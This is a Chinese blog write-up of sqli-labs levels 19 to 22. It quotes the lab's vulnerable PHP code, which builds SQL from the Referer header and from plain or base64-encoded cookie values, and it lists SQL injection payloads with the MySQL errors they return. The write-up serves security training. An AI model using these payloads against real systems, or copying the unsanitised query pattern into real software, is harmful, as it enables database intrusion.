sqli labs 4

最新推荐文章于 2022-07-06 15:10:33 发布

u014704893

最新推荐文章于 2022-07-06 15:10:33 发布

阅读量248

点赞数

分类专栏：总结文章标签： sqli-labs

本文链接：https://blog.csdn.net/u014704893/article/details/52805822

版权

总结专栏收录该内容

14 篇文章 0 订阅

订阅专栏

1. 题目19：

题目19中的注入是header 头注入，要想注入的前提是知道用户名，密码
$row1 = mysql_fetch_array($result1);
        if($row1)
            {
            echo '<font color= "#FFFF00" font size = 3 >';
            $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            mysql_query($insert);
            //echo 'Your IP ADDRESS is: ' .$IP;
            echo "</font>";
            //echo "<br>";
            echo '<font color= "#0000ff" font size = 3 >';          
            echo 'Your Referer is: ' .$uagent;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());         
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";

            }
所以注入在： Referer
构造referer： aa','') # 页面正常显示
构造referer：aa' 页面报错，因此这里存在注入

利用：Referer:' or 1=(select count(*) from usersw) ,'')#
报错：Table 'security.usersw' doesn't exist

2.题目20：

读源码： 设置cookie： a'
post数据：uname=afda&passwd=d 后面没有submit

提交后报错：Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aa'''''' LIMIT 0,1' at line 1

ok，注入找见了，是cookie注入，利用
cookie: uname=aa' and (select count(*) from aa) >0 #
报错：Issue with your mysql: Table 'security.aa' doesn't exist

3.题目21

直接上源码分析：
    echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
            echo '<font color= "orange" font size = 5 >';           
            echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

            $cookee = base64_decode($cookee);
            echo "<br></font>";
            $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
            $result=mysql_query($sql);
            if (!$result)
                {
                die('Issue with your mysql: ' . mysql_error());
                }
            $row = mysql_fetch_array($result);

post 数据：
uname=admin1ds&passwd=fda
cookie中的uname base64 加密
设置cookie：uname=' 加密后：cookie: uname=Jw==
提交页面报错：Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

设置cookie: uname=') and (select count(*) from user)>0 #
加密后： cookie： uname=JykgYW5kIChzZWxlY3QgY291bnQoKikgZnJvbSB1c2VyKT4wICM=
返回错误：Issue with your mysql: Table 'security.user' doesn't exist

ok，注入找见了

3.题目22:

直接上源代码：
echo '<font color= "orange" font size = 5 >';           
            echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

            $cookee = base64_decode($cookee);
            $cookee1 = '"'. $cookee. '"';
            echo "<br></font>";
            $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
            $result=mysql_query($sql);
            if (!$result)
                {
                die('Issue with your mysql: ' . mysql_error());
                }
            $row = mysql_fetch_array($result);
            if($row)
                {
post 数据：
uname=admin1ds&passwd=fda
cookie中的uname base64 加密
sql语句是：SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1

u014704893

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sqli labs 4

1. 题目19：题目19中的注入是header 头注入，要想注入的前提是知道用户名，密码$row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT
复制链接

扫一扫

专栏目录